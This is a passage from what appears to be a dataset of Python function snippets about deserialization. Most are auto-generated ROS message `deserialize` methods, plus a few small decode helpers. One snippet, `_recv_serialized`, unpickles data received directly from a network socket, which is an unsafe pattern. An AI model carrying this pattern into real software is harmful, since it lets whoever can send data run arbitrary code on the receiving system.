end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.body_version = str[start:end].decode('utf-8')\n else:\n self.body_version = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.arm_version = str[start:end].decode('utf-8')\n else:\n self.arm_version = str[start:end]\n _x = self\n start = end\n end += 14\n (_x.has_laser, _x.has_extended_arms, _x.number_of_legs, _x.number_of_arms, _x.number_of_hands,) = _struct_2B3i.unpack(str[start:end])\n self.has_laser = bool(self.has_laser)\n self.has_extended_arms = bool(self.has_extended_arms)\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) #most likely buffer underfill", "def decode(cls, buffer):\n\n if len(buffer) < struct.calcsize(b\"<i\"):\n raise IncompleteMessageError\n size = struct.unpack(b\"<i\", buffer[:4])[0]\n if len(buffer) - struct.calcsize(b\"<i\") < size:\n raise IncompleteMessageError\n packet = buffer[:size + 4]\n buffer = buffer[size + 4:]\n id = struct.unpack(b\"<i\", packet[4:8])[0]\n type = struct.unpack(b\"<i\", packet[8:12])[0]\n body = packet[12:][:-2].decode(\"ascii\")\n return cls(id, type, body), buffer", "def unpack(self, s):\n\n raise NotImplementedError()", "def deserialize(self, str):\n try:\n if self.line is None:\n self.line = None\n if self.circle is None:\n self.circle = None\n end = 0\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.id = str[start:end].decode('utf-8')\n else:\n self.id = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.line = []\n for i in range(0, length):\n val1 = krssg_ssl_msgs.msg.sslDebug_Line()\n _x = val1\n start = end\n end += 20\n (_x.x1, _x.y1, _x.x2, _x.y2, _x.color,) = _get_struct_4if().unpack(str[start:end])\n self.line.append(val1)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.circle = []\n for i in range(0, length):\n val1 = krssg_ssl_msgs.msg.sslDebug_Circle()\n _x = val1\n start = end\n end += 16\n (_x.x, _x.y, _x.radius, _x.color,) = _get_struct_3if().unpack(str[start:end])\n self.circle.append(val1)\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) #most likely buffer underfill", "def deserialize(self, str):\n try:\n end = 0\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.tsp_turtles = str[start:end].decode('utf-8')\n else:\n self.tsp_turtles = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.conveyor_turtle = str[start:end].decode('utf-8')\n else:\n self.conveyor_turtle = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.catch_turtle = str[start:end].decode('utf-8')\n else:\n self.catch_turtle = str[start:end]\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) #most likely buffer underfill", "def deserialize(self, str):\n try:\n if self.header is None:\n self.header = std_msgs.msg.Header()\n if self.RPY is None:\n self.RPY = geometry_msgs.msg.Vector3()\n if self.LLA is None:\n self.LLA = geometry_msgs.msg.Vector3()\n if self.NedVel is None:\n self.NedVel = geometry_msgs.msg.Vector3()\n end = 0\n _x = self\n start = end\n end += 12\n (_x.header.seq, _x.header.stamp.secs, _x.header.stamp.nsecs,) = _get_struct_3I().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.header.frame_id = str[start:end].decode('utf-8')\n else:\n self.header.frame_id = str[start:end]\n _x = self\n start = end\n end += 116\n (_x.Time, _x.Week, _x.Status, _x.RPY.x, _x.RPY.y, _x.RPY.z, _x.LLA.x, _x.LLA.y, _x.LLA.z, _x.NedVel.x, _x.NedVel.y, _x.NedVel.z, _x.YawUncertainty, _x.PitchUncertainty, _x.RollUncertainty, _x.PosUncertainty, _x.VelUncertainty, _x.SyncInTime, _x.SyncInCount,) = _get_struct_d2H9d5fdI().unpack(str[start:end])\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) #most likely buffer underfill", "def deserialize(self, str):\n try:\n if self.header is None:\n self.header = std_msgs.msg.Header()\n if self.pointA is None:\n self.pointA = nubot_common.msg.Point2d()\n if self.pointB is None:\n self.pointB = nubot_common.msg.Point2d()\n end = 0\n _x = self\n start = end\n end += 12\n (_x.header.seq, _x.header.stamp.secs, _x.header.stamp.nsecs,) = _get_struct_3I().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.header.frame_id = str[start:end].decode('utf-8')\n else:\n self.header.frame_id = str[start:end]\n _x = self\n start = end\n end += 26\n (_x.MatchMode, _x.MatchType, _x.TestMode, _x.pointA.x, _x.pointA.y, _x.pointB.x, _x.pointB.y, _x.angleA, _x.angleB, _x.idA, _x.idB, _x.kickforce,) = _get_struct_3B4f2h3B().unpack(str[start:end])\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) #most likely buffer underfill", "def deserialize(self, str):\n try:\n if self.header is None:\n self.header = std_msgs.msg.Header()\n if self.x is None:\n self.x = geometry_msgs.msg.PoseStamped()\n if self.x_desi is None:\n self.x_desi = geometry_msgs.msg.PoseStamped()\n if self.x_desi_filtered is None:\n self.x_desi_filtered = geometry_msgs.msg.PoseStamped()\n if self.x_err is None:\n self.x_err = geometry_msgs.msg.Twist()\n if self.xd is None:\n self.xd = geometry_msgs.msg.Twist()\n if self.xd_desi is None:\n self.xd_desi = geometry_msgs.msg.Twist()\n if self.F is None:\n self.F = geometry_msgs.msg.Wrench()\n if self.J is None:\n self.J = std_msgs.msg.Float64MultiArray()\n if self.N is None:\n self.N = std_msgs.msg.Float64MultiArray()\n end = 0\n _x = self\n start = end\n end += 12\n (_x.header.seq, _x.header.stamp.secs, _x.header.stamp.nsecs,) = _get_struct_3I().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.header.frame_id = str[start:end].decode('utf-8')\n else:\n self.header.frame_id = str[start:end]\n _x = self\n start = end\n end += 12\n (_x.x.header.seq, _x.x.header.stamp.secs, _x.x.header.stamp.nsecs,) = _get_struct_3I().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.x.header.frame_id = str[start:end].decode('utf-8')\n else:\n self.x.header.frame_id = str[start:end]\n _x = self\n start = end\n end += 68\n (_x.x.pose.position.x, _x.x.pose.position.y, _x.x.pose.position.z, _x.x.pose.orientation.x, _x.x.pose.orientation.y, _x.x.pose.orientation.z, _x.x.pose.orientation.w, _x.x_desi.header.seq, _x.x_desi.header.stamp.secs, _x.x_desi.header.stamp.nsecs,) = _get_struct_7d3I().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.x_desi.header.frame_id = str[start:end].decode('utf-8')\n else:\n self.x_desi.header.frame_id = str[start:end]\n _x = self\n start = end\n end += 68\n (_x.x_desi.pose.position.x, _x.x_desi.pose.position.y, _x.x_desi.pose.position.z, _x.x_desi.pose.orientation.x, _x.x_desi.pose.orientation.y, _x.x_desi.pose.orientation.z, _x.x_desi.pose.orientation.w, _x.x_desi_filtered.header.seq, _x.x_desi_filtered.header.stamp.secs, _x.x_desi_filtered.header.stamp.nsecs,) = _get_struct_7d3I().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.x_desi_filtered.header.frame_id = str[start:end].decode('utf-8')\n else:\n self.x_desi_filtered.header.frame_id = str[start:end]\n _x = self\n start = end\n end += 248\n (_x.x_desi_filtered.pose.position.x, _x.x_desi_filtered.pose.position.y, _x.x_desi_filtered.pose.position.z, _x.x_desi_filtered.pose.orientation.x, _x.x_desi_filtered.pose.orientation.y, _x.x_desi_filtered.pose.orientation.z, _x.x_desi_filtered.pose.orientation.w, _x.x_err.linear.x, _x.x_err.linear.y, _x.x_err.linear.z, _x.x_err.angular.x, _x.x_err.angular.y, _x.x_err.angular.z, _x.xd.linear.x, _x.xd.linear.y, _x.xd.linear.z, _x.xd.angular.x, _x.xd.angular.y, _x.xd.angular.z, _x.xd_desi.linear.x, _x.xd_desi.linear.y, _x.xd_desi.linear.z, _x.xd_desi.angular.x, _x.xd_desi.angular.y, _x.xd_desi.angular.z, _x.F.force.x, _x.F.force.y, _x.F.force.z, _x.F.torque.x, _x.F.torque.y, _x.F.torque.z,) = _get_struct_31d().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sd'%length\n start = end\n end += struct.calcsize(pattern)\n self.tau_pose = struct.unpack(pattern, str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sd'%length\n start = end\n end += struct.calcsize(pattern)\n self.tau_posture = struct.unpack(pattern, str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sd'%length\n start = end\n end += struct.calcsize(pattern)\n self.tau = struct.unpack(pattern, str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.J.layout.dim = []\n for i in range(0, length):\n val1 = std_msgs.msg.MultiArrayDimension()\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val1.label = str[start:end].decode('utf-8')\n else:\n val1.label = str[start:end]\n _x = val1\n start = end\n end += 8\n (_x.size, _x.stride,) = _get_struct_2I().unpack(str[start:end])\n self.J.layout.dim.append(val1)\n start = end\n end += 4\n (self.J.layout.data_offset,) = _get_struct_I().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sd'%length\n start = end\n end += struct.calcsize(pattern)\n self.J.data = struct.unpack(pattern, str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.N.layout.dim = []\n for i in range(0, length):\n val1 = std_msgs.msg.MultiArrayDimension()\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val1.label = str[start:end].decode('utf-8')\n else:\n val1.label = str[start:end]\n _x = val1\n start = end\n end += 8\n (_x.size, _x.stride,) = _get_struct_2I().unpack(str[start:end])\n self.N.layout.dim.append(val1)\n start = end\n end += 4\n (self.N.layout.data_offset,) = _get_struct_I().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sd'%length\n start = end\n end += struct.calcsize(pattern)\n self.N.data = struct.unpack(pattern, str[start:end])\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) #most likely buffer underfill", "def deserialize(self, str):\n try:\n if self.position is None:\n self.position = pcl_segment.msg.positionRPY()\n end = 0\n _x = self\n start = end\n end += 57\n (_x.position.x, _x.position.y, _x.position.z, _x.position.roll, _x.position.pitch, _x.position.yaw, _x.position.stamp.secs, _x.position.stamp.nsecs, _x.is_Known,) = _get_struct_6d2IB().unpack(str[start:end])\n self.is_Known = bool(self.is_Known)\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) #most likely buffer underfill", "def deserialize(self, str):\n try:\n end = 0\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) #most likely buffer underfill", "def deserialize(self, str):\n try:\n end = 0\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) #most likely buffer underfill", "def deserialize(self, str):\n try:\n end = 0\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) #most likely buffer underfill", "def deserialize(self, str):\n codecs.lookup_error(\"rosmsg\").msg_type = self._type\n try:\n if self.header is None:\n self.header = std_msgs.msg.Header()\n if self.actors is None:\n self.actors = None\n end = 0\n _x = self\n start = end\n end += 12\n (_x.header.seq, _x.header.stamp.secs, _x.header.stamp.nsecs,) = _get_struct_3I().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.header.frame_id = str[start:end].decode('utf-8', 'rosmsg')\n else:\n self.header.frame_id = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.actors = []\n for i in range(0, length):\n val1 = nesfr3_msgs.msg.Actor()\n _v9 = val1.header\n start = end\n end += 4\n (_v9.seq,) = _get_struct_I().unpack(str[start:end])\n _v10 = _v9.stamp\n _x = _v10\n start = end\n end += 8\n (_x.secs, _x.nsecs,) = _get_struct_2I().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n _v9.frame_id = str[start:end].decode('utf-8', 'rosmsg')\n else:\n _v9.frame_id = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val1.name = str[start:end].decode('utf-8', 'rosmsg')\n else:\n val1.name = str[start:end]\n start = end\n end += 4\n (val1.tracking_id,) = _get_struct_I().unpack(str[start:end])\n _v11 = val1.pose\n _v12 = _v11.pose\n _v13 = _v12.position\n _x = _v13\n start = end\n end += 24\n (_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end])\n _v14 = _v12.orientation\n _x = _v14\n start = end\n end += 32\n (_x.x, _x.y, _x.z, _x.w,) = _get_struct_4d().unpack(str[start:end])\n start = end\n end += 288\n _v11.covariance = _get_struct_36d().unpack(str[start:end])\n val1.points = []\n for i in range(0, 18):\n val2 = nesfr3_msgs.msg.PointWithConfidence()\n _v15 = val2.point\n _x = _v15\n start = end\n end += 24\n (_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end])\n start = end\n end += 4\n (val2.confidence,) = _get_struct_f().unpack(str[start:end])\n val1.points.append(val2)\n _v16 = val1.nose_point\n _x = _v16\n start = end\n end += 24\n (_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end])\n self.actors.append(val1)\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) # most likely buffer underfill", "def parse_Bytes(serialized_bytes, msg_class):\n if msg_class is None or msg_class is bytes:\n return serialized_bytes\n msg = msg_class()\n msg.ParseFromString(serialized_bytes)\n return msg", "def deserialize(self, str):\n try:\n end = 0\n start = end\n end += 2580\n self.Rscanpose = _get_struct_645f().unpack(str[start:end])\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) #most likely buffer underfill", "def deserialize(self, str):\n try:\n if self.header is None:\n self.header = std_msgs.msg.Header()\n if self.predict is None:\n self.predict = argus_msgs.msg.FilterPredictStep()\n if self.update is None:\n self.update = argus_msgs.msg.FilterUpdateStep()\n end = 0\n _x = self\n start = end\n end += 12\n (_x.header.seq, _x.header.stamp.secs, _x.header.stamp.nsecs,) = _get_struct_3I().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.header.frame_id = str[start:end].decode('utf-8')\n else:\n self.header.frame_id = str[start:end]\n _x = self\n start = end\n end += 26\n (_x.step_num, _x.info_type, _x.predict.step_dt, _x.predict.trans_jacobian.column_major, _x.predict.trans_jacobian.rows, _x.predict.trans_jacobian.cols,) = _get_struct_QBdB2I().unpack(str[start:end])\n self.predict.trans_jacobian.column_major = bool(self.predict.trans_jacobian.column_major)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sd'%length\n start = end\n end += struct.calcsize(pattern)\n self.predict.trans_jacobian.data = struct.unpack(pattern, str[start:end])\n _x = self\n start = end\n end += 9\n (_x.predict.trans_noise_cov.column_major, _x.predict.trans_noise_cov.rows, _x.predict.trans_noise_cov.cols,) = _get_struct_B2I().unpack(str[start:end])\n self.predict.trans_noise_cov.column_major = bool(self.predict.trans_noise_cov.column_major)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sd'%length\n start = end\n end += struct.calcsize(pattern)\n self.predict.trans_noise_cov.data = struct.unpack(pattern, str[start:end])\n _x = self\n start = end\n end += 9\n (_x.predict.prior_state_cov.column_major, _x.predict.prior_state_cov.rows, _x.predict.prior_state_cov.cols,) = _get_struct_B2I().unpack(str[start:end])\n self.predict.prior_state_cov.column_major = bool(self.predict.prior_state_cov.column_major)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sd'%length\n start = end\n end += struct.calcsize(pattern)\n self.predict.prior_state_cov.data = struct.unpack(pattern, str[start:end])\n _x = self\n start = end\n end += 9\n (_x.predict.post_state_cov.column_major, _x.predict.post_state_cov.rows, _x.predict.post_state_cov.cols,) = _get_struct_B2I().unpack(str[start:end])\n self.predict.post_state_cov.column_major = bool(self.predict.post_state_cov.column_major)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sd'%length\n start = end\n end += struct.calcsize(pattern)\n self.predict.post_state_cov.data = struct.unpack(pattern, str[start:end])\n _x = self\n start = end\n end += 9\n (_x.update.prior_state_cov.column_major, _x.update.prior_state_cov.rows, _x.update.prior_state_cov.cols,) = _get_struct_B2I().unpack(str[start:end])\n self.update.prior_state_cov.column_major = bool(self.update.prior_state_cov.column_major)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sd'%length\n start = end\n end += struct.calcsize(pattern)\n self.update.prior_state_cov.data = struct.unpack(pattern, str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sd'%length\n start = end\n end += struct.calcsize(pattern)\n self.update.prior_obs_error = struct.unpack(pattern, str[start:end])\n _x = self\n start = end\n end += 9\n (_x.update.obs_error_cov.column_major, _x.update.obs_error_cov.rows, _x.update.obs_error_cov.cols,) = _get_struct_B2I().unpack(str[start:end])\n self.update.obs_error_cov.column_major = bool(self.update.obs_error_cov.column_major)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sd'%length\n start = end\n end += struct.calcsize(pattern)\n self.update.obs_error_cov.data = struct.unpack(pattern, str[start:end])\n _x = self\n start = end\n end += 9\n (_x.update.post_state_cov.column_major, _x.update.post_state_cov.rows, _x.update.post_state_cov.cols,) = _get_struct_B2I().unpack(str[start:end])\n self.update.post_state_cov.column_major = bool(self.update.post_state_cov.column_major)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sd'%length\n start = end\n end += struct.calcsize(pattern)\n self.update.post_state_cov.data = struct.unpack(pattern, str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sd'%length\n start = end\n end += struct.calcsize(pattern)\n self.update.state_delta = struct.unpack(pattern, str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sd'%length\n start = end\n end += struct.calcsize(pattern)\n self.update.post_obs_error = struct.unpack(pattern, str[start:end])\n _x = self\n start = end\n end += 9\n (_x.update.obs_jacobian.column_major, _x.update.obs_jacobian.rows, _x.update.obs_jacobian.cols,) = _get_struct_B2I().unpack(str[start:end])\n self.update.obs_jacobian.column_major = bool(self.update.obs_jacobian.column_major)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sd'%length\n start = end\n end += struct.calcsize(pattern)\n self.update.obs_jacobian.data = struct.unpack(pattern, str[start:end])\n _x = self\n start = end\n end += 9\n (_x.update.obs_noise_cov.column_major, _x.update.obs_noise_cov.rows, _x.update.obs_noise_cov.cols,) = _get_struct_B2I().unpack(str[start:end])\n self.update.obs_noise_cov.column_major = bool(self.update.obs_noise_cov.column_major)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sd'%length\n start = end\n end += struct.calcsize(pattern)\n self.update.obs_noise_cov.data = struct.unpack(pattern, str[start:end])\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) #most likely buffer underfill", "def decode_message(self, raw):\n return raw.decode('utf-8')", "def deserialize(self, str):\n try:\n end = 0\n _x = self\n start = end\n end += 112\n (_x.u0, _x.h0, _x.vl, _x.i0, _x.wv, _x.wh, _x.wi, _x.h_stop, _x.T_gap, _x.v_max, _x.v_min, _x.h_min, _x.i_max, _x.i_min,) = _struct_14d.unpack(str[start:end])\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) #most likely buffer underfill", "def deserialize(self, str):\n codecs.lookup_error(\"rosmsg\").msg_type = self._type\n try:\n if self.nodes is None:\n self.nodes = None\n end = 0\n _x = self\n start = end\n end += 14\n (_x.role, _x.id, _x.local_time, _x.system_time, _x.voltage,) = _get_struct_2B2If().unpack(str[start:end])\n start = end\n end += 12\n self.pos_3d = _get_struct_3f().unpack(str[start:end])\n start = end\n end += 12\n self.eop_3d = _get_struct_3f().unpack(str[start:end])\n start = end\n end += 12\n self.vel_3d = _get_struct_3f().unpack(str[start:end])\n start = end\n end += 12\n self.angle_3d = _get_struct_3f().unpack(str[start:end])\n start = end\n end += 16\n self.quaternion = _get_struct_4f().unpack(str[start:end])\n start = end\n end += 12\n self.imu_gyro_3d = _get_struct_3f().unpack(str[start:end])\n start = end\n end += 12\n self.imu_acc_3d = _get_struct_3f().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.nodes = []\n for i in range(0, length):\n val1 = nlink_parser.msg.LinktrackNode2()\n _x = val1\n start = end\n end += 14\n (_x.role, _x.id, _x.dis, _x.fp_rssi, _x.rx_rssi,) = _get_struct_2B3f().unpack(str[start:end])\n self.nodes.append(val1)\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) # most likely buffer underfill", "def deserialize(self, str):\n try:\n end = 0\n _x = self\n start = end\n end += 56\n (_x.s_x, _x.s_y, _x.f_x, _x.f_y, _x.step_size, _x.bias_param, _x.max_iteration,) = _struct_7q.unpack(str[start:end])\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) #most likely buffer underfill", "def deserialize(self, str):\n try:\n end = 0\n _x = self\n start = end\n end += 16\n (_x.FL_vel, _x.FR_vel, _x.BL_vel, _x.BR_vel,) = _struct_4i.unpack(str[start:end])\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) #most likely buffer underfill", "def deserialize(self, str):\n try:\n end = 0\n _x = self\n start = end\n end += 100\n (_x.id, _x.age, _x.velocidad_relativa_x, _x.velocidad_relativa_y, _x.velocidad_absoluta_x, _x.velocidad_absoluta_y, _x.velocidad_absoluta_sigma_x, _x.velocidad_absoluta_sigma_y, _x.bounding_box_centro_x, _x.bounding_box_centro_y, _x.bounding_box_largo, _x.bounding_box_ancho, _x.object_box_centro_x, _x.object_box_centro_y, _x.object_box_orientacion, _x.object_box_size_x, _x.object_box_size_y, _x.clasificacion, _x.clasificacion_age, _x.clasificacion_certeza, _x.punto_cercano_x, _x.punto_cercano_y, _x.punto_referencia_x, _x.punto_referencia_y, _x.punto_referencia_sigma_x, _x.punto_referencia_sigma_y,) = _get_struct_h16fh8f().unpack(str[start:end])\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) #most likely buffer underfill", "def deserialize(self, str):\n try:\n end = 0\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.object1 = str[start:end].decode('utf-8')\n else:\n self.object1 = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.object2 = str[start:end].decode('utf-8')\n else:\n self.object2 = str[start:end]\n _x = self\n start = end\n end += 12\n (_x.penetration_distance, _x.operation,) = _struct_di.unpack(str[start:end])\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) #most likely buffer underfill", "def deserialize(self, str):\n if python3:\n codecs.lookup_error(\"rosmsg\").msg_type = self._type\n try:\n if self.header is None:\n self.header = std_msgs.msg.Header()\n end = 0\n _x = self\n start = end\n end += 12\n (_x.header.seq, _x.header.stamp.secs, _x.header.stamp.nsecs,) = _get_struct_3I().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.header.frame_id = str[start:end].decode('utf-8', 'rosmsg')\n else:\n self.header.frame_id = str[start:end]\n _x = self\n start = end\n end += 86\n (_x.sample_count, _x.ekf_roll, _x.ekf_pitch, _x.ekf_yaw, _x.ekf_lat, _x.ekf_lon, _x.ekf_alt, _x.ekf_vN, _x.ekf_vE, _x.ekf_vD, _x.ekf_vX, _x.ekf_vY, _x.ekf_vZ, _x.rad_gyro_X, _x.rad_gyro_Y, _x.rad_gyro_Z, _x.angular_acc_X, _x.angular_acc_Y, _x.angular_acc_Z, _x.alt_DVL,) = _get_struct_I3f2d13fH().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n self.dvl_error_code = str[start:end]\n _x = self\n start = end\n end += 73\n (_x.flag_to_check, _x.imu_deg_gyro_X, _x.imu_deg_gyro_Y, _x.imu_deg_gyro_Z, _x.imu_mag_X, _x.imu_mag_Y, _x.imu_mag_Z, _x.imu_acc_X, _x.imu_acc_Y, _x.imu_acc_Z, _x.gps_lat, _x.gps_lon, _x.gps_alt, _x.gps_vN, _x.gps_vE, _x.gps_vD, _x.dvl_vX, _x.dvl_vY, _x.dvl_vZ,) = _get_struct_B9f2i7f().unpack(str[start:end])\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) # most likely buffer underfill", "def _recv_serialized(self, socket):\n msg = pickle.loads(socket.recv())\n return msg", "def deserialize(self, str):\n if python3:\n codecs.lookup_error(\"rosmsg\").msg_type = self._type\n try:\n if self.graspable_objects is None:\n self.graspable_objects = None\n if self.image is None:\n self.image = sensor_msgs.msg.Image()\n if self.camera_info is None:\n self.camera_info = sensor_msgs.msg.CameraInfo()\n if self.meshes is None:\n self.meshes = None\n if self.reference_to_camera is None:\n self.reference_to_camera = geometry_msgs.msg.Pose()\n end = 0\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.graspable_objects = []\n for i in range(0, length):\n val1 = manipulation_msgs.msg.GraspableObject()\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val1.reference_frame_id = str[start:end].decode('utf-8', 'rosmsg')\n else:\n val1.reference_frame_id = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n val1.potential_models = []\n for i in range(0, length):\n val2 = household_objects_database_msgs.msg.DatabaseModelPose()\n start = end\n end += 4\n (val2.model_id,) = _get_struct_i().unpack(str[start:end])\n _v32 = val2.type\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n _v32.key = str[start:end].decode('utf-8', 'rosmsg')\n else:\n _v32.key = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n _v32.db = str[start:end].decode('utf-8', 'rosmsg')\n else:\n _v32.db = str[start:end]\n _v33 = val2.pose\n _v34 = _v33.header\n start = end\n end += 4\n (_v34.seq,) = _get_struct_I().unpack(str[start:end])\n _v35 = _v34.stamp\n _x = _v35\n start = end\n end += 8\n (_x.secs, _x.nsecs,) = _get_struct_2I().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n _v34.frame_id = str[start:end].decode('utf-8', 'rosmsg')\n else:\n _v34.frame_id = str[start:end]\n _v36 = _v33.pose\n _v37 = _v36.position\n _x = _v37\n start = end\n end += 24\n (_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end])\n _v38 = _v36.orientation\n _x = _v38\n start = end\n end += 32\n (_x.x, _x.y, _x.z, _x.w,) = _get_struct_4d().unpack(str[start:end])\n start = end\n end += 4\n (val2.confidence,) = _get_struct_f().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val2.detector_name = str[start:end].decode('utf-8', 'rosmsg')\n else:\n val2.detector_name = str[start:end]\n val1.potential_models.append(val2)\n _v39 = val1.cluster\n _v40 = _v39.header\n start = end\n end += 4\n (_v40.seq,) = _get_struct_I().unpack(str[start:end])\n _v41 = _v40.stamp\n _x = _v41\n start = end\n end += 8\n (_x.secs, _x.nsecs,) = _get_struct_2I().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n _v40.frame_id = str[start:end].decode('utf-8', 'rosmsg')\n else:\n _v40.frame_id = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n _v39.points = []\n for i in range(0, length):\n val3 = geometry_msgs.msg.Point32()\n _x = val3\n start = end\n end += 12\n (_x.x, _x.y, _x.z,) = _get_struct_3f().unpack(str[start:end])\n _v39.points.append(val3)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n _v39.channels = []\n for i in range(0, length):\n val3 = sensor_msgs.msg.ChannelFloat32()\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val3.name = str[start:end].decode('utf-8', 'rosmsg')\n else:\n val3.name = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sf'%length\n start = end\n s = struct.Struct(pattern)\n end += s.size\n val3.values = s.unpack(str[start:end])\n _v39.channels.append(val3)\n _v42 = val1.region\n _v43 = _v42.cloud\n _v44 = _v43.header\n start = end\n end += 4\n (_v44.seq,) = _get_struct_I().unpack(str[start:end])\n _v45 = _v44.stamp\n _x = _v45\n start = end\n end += 8\n (_x.secs, _x.nsecs,) = _get_struct_2I().unpack(str[start:end])\n start = end\n end += 4\n (length,) = 